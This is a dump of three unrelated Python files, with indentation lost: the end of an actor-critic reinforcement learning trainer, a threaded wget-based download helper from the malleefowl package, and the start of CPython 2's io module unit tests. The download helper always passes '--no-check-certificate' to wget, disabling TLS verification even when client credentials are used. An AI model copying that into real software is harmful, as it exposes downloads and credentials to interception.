ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
# Call tensorflow operations to:
# (1) update the critic, by calling agent.update_critic
# (2) use the updated critic to compute the advantage by, calling agent.estimate_advantage
# (3) use the estimated advantage values to update the actor, by calling agent.update_actor
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
parser.add_argument('--subdir', type=str, default='data', help = 'Specify the name of subdirectory to store the results at.\
Useful for building plots from this directory later')
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), args.subdir)
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
download.py
|
"""
TODO: handle parallel downloads
"""
import os
import urlparse
import threading
from Queue import Queue, Empty
import subprocess
from malleefowl import config
from malleefowl.utils import esgf_archive_path
from malleefowl.exceptions import ProcessFailed
import logging
LOGGER = logging.getLogger("PYWPS")
def download_with_archive(url, credentials=None):
"""
Downloads file. Checks before downloading if file is already in
local esgf archive.
"""
file_url = esgf_archive_path(url)
if file_url is None:
file_url = download(url, use_file_url=True, credentials=credentials)
return file_url
def download(url, use_file_url=False, credentials=None):
"""
Downloads url and returns local filename.
:param url: url of file
:param use_file_url: True if result should be a file url "file://", otherwise use system path.
:param credentials: path to credentials if security is needed to download file
:returns: downloaded file with either file:// or system path
"""
import urlparse
parsed_url = urlparse.urlparse(url)
if parsed_url.scheme == 'file':
result = url
else:
result = wget(url=url, use_file_url=use_file_url, credentials=credentials)
return result
def wget(url, use_file_url=False, credentials=None):
"""
Downloads url and returns local filename.
TODO: refactor cache handling.
:param url: url of file
:param use_file_url: True if result should be a file url "file://", otherwise use system path.
:param credentials: path to credentials if security is needed to download file
:returns: downloaded file with either file:// or system path
"""
LOGGER.info('downloading %s', url)
parsed_url = urlparse.urlparse(url)
filename = os.path.join(
config.cache_path(),
parsed_url.netloc,
parsed_url.path.strip('/'))
# check if in cache
if os.path.isfile(filename):
LOGGER.debug("using cached file.")
if use_file_url:
filename = "file://" + filename
return filename
local_cache_path = os.path.abspath(os.curdir)
dn_filename = os.path.join(
local_cache_path,
parsed_url.netloc,
parsed_url.path.strip('/'))
if not os.path.isdir(os.path.dirname(dn_filename)):
LOGGER.debug("Creating download directories.")
os.makedirs(os.path.dirname(dn_filename), 0700)
try:
cmd = ["wget"]
if credentials is not None:
LOGGER.debug('using credentials')
cmd.extend(["--certificate", credentials])
cmd.extend(["--private-key", credentials])
cmd.extend(["--ca-certificate", credentials])
cmd.append("--no-check-certificate")
# if not LOGGER.isEnabledFor(logging.DEBUG):
# cmd.append("--quiet")
cmd.append("--tries=3") # max 2 retries
cmd.append("-N") # turn on timestamping
cmd.append("--continue") # continue partial downloads
#cmd.append("-x") # force creation of directories
cmd.extend(["-O", dn_filename])
cmd.extend(["-P", local_cache_path]) # directory prefix
cmd.append(url) # download url
LOGGER.debug("cmd: %s", ' '.join(cmd))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
LOGGER.debug("output: %s", output)
except subprocess.CalledProcessError as e:
msg = "wget failed on {0}: {1.output}".format(url, e)
LOGGER.exception(msg)
raise ProcessFailed(msg)
except Exception:
msg = "wget failed on {0}.".format(url)
LOGGER.exception(msg)
raise ProcessFailed(msg)
if not os.path.exists(filename):
LOGGER.debug("linking downloaded file to cache.")
if not os.path.isdir(os.path.dirname(filename)):
LOGGER.debug("Creating cache directories.")
os.makedirs(os.path.dirname(filename), 0700)
try:
os.link(dn_filename, filename)
except Exception:
LOGGER.warn('Could not link file, try to copy it ...')
from shutil import copy2
copy2(dn_filename, filename)
if use_file_url:
filename = "file://" + filename
return filename
def download_files(urls=[], credentials=None, monitor=None):
dm = DownloadManager(monitor)
return dm.download(urls, credentials)
def download_files_from_thredds(url, recursive=False, monitor=None):
import threddsclient
return download_files(urls=threddsclient.download_urls(url), monitor=monitor)
class DownloadManager(object):
def __init__(self, monitor=None):
self.files = []
self.count = 0
self.monitor = monitor
def show_status(self, message, progress):
if self.monitor is None:
LOGGER.info("%s, progress=%d/100", message, progress)
else:
self.monitor(message, progress)
# The threader thread pulls an worker from the queue and processes it
def threader(self):
queue_full = True
while queue_full:
# Run the example job with the avail worker in queue (thread)
# TODO: handle exception ... maybe download job should stop.
try:
# gets an worker from the queue
worker = self.job_queue.get()
self.download_job(**worker)
except Empty:
queue_full = False
except Exception:
LOGGER.exception('download failed!')
queue_full = False
finally:
# completed with the job
self.job_queue.task_done()
def download_job(self, url, credentials):
file_url = download_with_archive(url, credentials)
with self.result_lock:
self.files.append(file_url)
self.count = self.count + 1
progress = self.count * 100.0 / self.max_count
self.show_status('Downloaded %d/%d' % (self.count, self.max_count),
progress)
def download(self, urls, credentials=None):
# start ...
from datetime import datetime
t0 = datetime.now()
self.show_status("start downloading of %d files" % len(urls), 0)
# lock for parallel search
self.result_lock = threading.Lock()
self.files = []
self.count = 0
self.max_count = len(urls)
# init threading
self.job_queue = Queue()
# using max 4 thredds
num_threads = min(4, len(urls))
LOGGER.info('starting %d download threads', num_threads)
for x in range(num_threads):
t = threading.Thread(target=self.threader)
# classifying as a daemon, so they will die when the main dies
t.daemon = True
# begins, must come after daemon definition
t.start()
for url in urls:
# fill job queue
self.job_queue.put(dict(url=url, credentials=credentials))
# wait until the thread terminates.
self.job_queue.join()
# how long?
duration = (datetime.now() - t0).seconds
self.show_status(
"downloaded %d files in %d seconds" % (len(urls), duration), 100)
if len(self.files) != len(urls):
raise ProcessFailed(
"could not download all files %d/%d" %
(len(self.files), len(urls)))
# done
return self.files
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # subject of test
import _io # compiled implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super(MockFileIO, self).__init__(data)
def read(self, n=None):
res = super(MockFileIO, self).read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super(MockFileIO, self).readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if not support.is_resource_enabled("largefile"):
skip_platform = None
# Cases in which to skip this test
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
skip_platform = sys.platform;
elif sys.platform[:4] == "java":
# Jython cases in which to skip this test
if os._name == "nt":
skip_platform = 'Jython + ' + os._name;
if skip_platform:
print("\nTesting large file ops skipped on %s." % skip_platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1 // 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1 // 0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super(MyFileIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyFileIO, self).close()
def flush(self):
record.append(3)
super(MyFileIO, self).flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
class CIOTest(IOTest):
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
# Jython does not use integer file descriptors but an object instead.
# Unfortunately, _pyio.open checks that it is an int.
# Override the affected test versions just so we can skip them visibly.
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_closefd_attr(self):
pass
@unittest.skipIf(support.is_jython, "Jython does not use integer file descriptors")
def test_read_closed(self):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
@unittest.skipIf(support.is_jython, "GC nondeterministic in Jython")
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
